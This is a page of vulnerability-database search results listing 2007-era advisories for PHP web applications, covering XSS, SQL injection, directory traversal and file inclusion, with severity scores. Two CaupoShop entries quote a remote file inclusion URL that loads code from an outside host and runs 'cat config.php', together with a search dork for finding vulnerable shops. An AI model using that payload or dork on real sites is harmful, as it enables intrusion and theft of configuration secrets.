
7210 matches found

Prion
added 2007/10/30 9:46 p.m., 10 views

Cross site scripting

Multiple cross-site scripting (XSS) vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via (1) the email parameter to index.php; or the command parameter to index.php in (2) the default action for the home page, (3) a currencies action, or (4) a basket action...

CVSS 4.3 | AI score 6.3 | EPSS 0.01465
Exploits: 1 | References: 4
NVD
added 2007/10/30 9:46 p.m., 14 views

CVE-2007-5719

SQL injection vulnerability in bbfuncsearch.php in miniBB 2.1 allows remote attackers to execute arbitrary SQL commands via the table parameter to index.php...

CVSS 7.5 | AI score 8.4 | EPSS 0.01006
Exploits: 0 | References: 4
NVD
added 2007/10/30 9:46 p.m., 11 views

CVE-2007-5725

Multiple cross-site scripting (XSS) vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via (1) the email parameter to index.php; or the command parameter to index.php in (2) the default action for the home page, (3) a currencies action, or (4) a basket action...

CVSS 4.3 | AI score 6 | EPSS 0.01465
Exploits: 1 | References: 4
Prion
added 2007/10/30 9:46 p.m., 14 views

Sql injection

SQL injection vulnerability in bbfuncsearch.php in miniBB 2.1 allows remote attackers to execute arbitrary SQL commands via the table parameter to index.php...

CVSS 7.5 | AI score 9.1 | EPSS 0.01006
Exploits: 0 | References: 4 | Affected Software: 1
Cvelist
added 2007/10/29 8:00 p.m., 37 views

CVE-2007-5692

Multiple cross-site scripting (XSS) vulnerabilities in SiteBar 3.3.8 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter to integrator.php; (2) the token parameter in a New Password action, (3) the nidacl parameter in a Folder Properties action, or (4) the uid parameter...

AI score 5.4 | EPSS 0.04772
Exploits: 1 | References: 14
Packet Storm
added 2007/10/29 12:00 a.m., 23 views

cauposhop-rfi.txt

dork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...

AI score 7.4
Exploits: 0
exploitpack
added 2007/10/29 12:00 a.m., 16 views

Smart-Shop - index.php Multiple Cross-Site Scripting Vulnerabilities

Smart-Shop - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/26232/info SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabiliti...

Exploits: 0
seebug.org
added 2007/10/29 12:00 a.m., 15 views

CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability

No description provided by source. dork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...

AI score 7.1
Exploits: 0
NVD
added 2007/10/26 6:46 p.m., 17 views

CVE-2007-5684

Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in (1) errorhandlerfile and (2) localphp parameters to a tiki-index.php, or (3) encoded "..%2F" sequences in the implanguage parameter to...

CVSS 7.5 | AI score 7.3 | EPSS 0.03024
Exploits: 0 | References: 2
Prion
added 2007/10/26 6:46 p.m., 16 views

Directory traversal

Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in (1) errorhandlerfile and (2) localphp parameters to a tiki-index.php, or (3) encoded "..%2F" sequences in the implanguage parameter to...

CVSS 7.5 | AI score 7.7 | EPSS 0.03024
Exploits: 0 | References: 2 | Affected Software: 1
Cvelist
added 2007/10/26 6:00 p.m., 21 views

CVE-2007-5684

Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in (1) errorhandlerfile and (2) localphp parameters to a tiki-index.php, or (3) encoded "..%2F" sequences in the implanguage parameter to...

AI score 7.3 | EPSS 0.03024
Exploits: 0 | References: 2
CVE
added 2007/10/25 7:00 p.m., 37 views

CVE-2003-1499

CVE-2003-1499 : A directory traversal flaw in Bytehoard 0.7’s index.php allows remote attackers to read arbitrary files by supplying a .. in the infolder parameter. The NVD entry lists CVSS v2 base metrics: AV:N/AC:L/Au:N/C:N/I:N/A:P with a base score of 5.0 (Medium) and network attack vector; ex...

CVSS 5 | AI score 7 | EPSS 0.02827
Exploits: 1 | References: 5 | Affected Software: 1
Prion
added 2007/10/23 9:47 p.m., 13 views

Directory traversal

Directory traversal vulnerability in system.php in ReloadCMS 1.2.7 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module parameter to index.php...

CVSS 7.5 | AI score 7.6 | EPSS 0.02368
Exploits: 1 | References: 4 | Affected Software: 1
seebug.org
added 2007/10/23 12:00 a.m., 16 views

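InstaGuide Weather Index.PHP File Inclusion Vulnerability

InstaGuide Weather is a PHP-based web application. InstaGuide Weather does not properly filter user-submitted input, so a remote attacker can exploit the vulnerability to view the contents of system files with the web server's privileges. The problem is that the 'Index.PHP' script does not filter the user-supplied 'PageName' parameter; submitting an application file as the parameter can lead to disclosure of sensitive information. InstaGuide Weather No solution is currently available: http://www.instaguide.com/index.php?PageName=products http://www.example.com/index.php?PageName=Local File%00...

AI score 7.1
Exploits: 0
seebug.org
added 2007/10/23 12:00 a.m., 86 views

DM CMS Index.PHP SQL Injection Vulnerability

DM CMS is a PHP-based web application. DM CMS does not properly filter user-submitted URI data, so a remote attacker can exploit the vulnerability to carry out SQL attacks, obtaining sensitive information or manipulating the database. The problem is that the 'index.php' script does not filter the user-supplied 'id' parameter; submitting a malicious SQL query as the parameter data can change the original SQL logic, and an attacker can obtain sensitive information or manipulate the database. DMCMS 0.7 No detailed solution is currently available: http://sourceforge.net/projects/dmcms/ http://www.example.com/index.php?page=media&id=SQL INJECTION CODE GOES HE...

AI score 7.1
Exploits: 0
exploitpack
added 2007/10/22 12:00 a.m., 26 views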

deeemm CMS (dmcms) 0.7 - index.php SQL Injection

deeemm CMS (dmcms) 0.7 - index.php SQL Injection source: https://www.securityfocus.com/bid/26169/info DMCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...

AI score 0.3
Exploits: 0
Packet Storm
added 2007/10/22 12:00 a.m., 31 views

visolfi.txt

Title : VISO apps Local File Inclusion Vulnerability Description : VISO apps is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Software: : http://www.viventus.no/visoapps/ Author : d3hydr8 Homepage : http://www.darkc0de.com Original Post :...

AI score 7.4
Exploits: 0
CVE
added 2007/10/20 10:00 a.m., 55 views

CVE-2003-1412

CVE-2003-1412 affects GOsa (GOnicus System Administrator) 1.0. It is a PHP remote file inclusion vulnerability where the plugin parameter in index.php can be controlled to include arbitrary PHP code from several paths: 3fax/1blocklists/index.php, 6departamentadmin/index.php, 5terminals/index.php,...

CVSS 6.8 | AI score 7.7 | EPSS 0.02691
Exploits: 1 | References: 6 | Affected Software: 1
CVE
added 2007/10/18 10:00 a.m., 47 views

CVE-2002-2277

PortailPHP 0.99 contains an SQL injection in mod_search/index.php. The vulnerability allows remote attackers to inject SQL via (1) $rech, (2) $BD_Tab_docs, (3) $BD_Tab_file, (4) $BD_Tab_liens, (5) $BD_Tab_faq, or (6) $chemin, potentially affecting confidentiality, integrity, and availability as i...

CVSS 7.5 | AI score 8.8 | EPSS 0.01051
Exploits: 0 | References: 3 | Affected Software: 1
Cvelist
added 2007/10/18 10:00 a.m., 19 views

CVE-2002-2277

SQL injection vulnerability in mod_search/index.php in PortailPHP 0.99 allows remote attackers to execute arbitrary SQL commands via the (1) $rech, (2) $BD_Tab_docs, (3) $BD_Tab_file, (4) $BD_Tab_liens, (5) $BD_Tab_faq, or (6) $chemin variables...

AI score 8.4 | EPSS 0.01051
Exploits: 0 | References: 3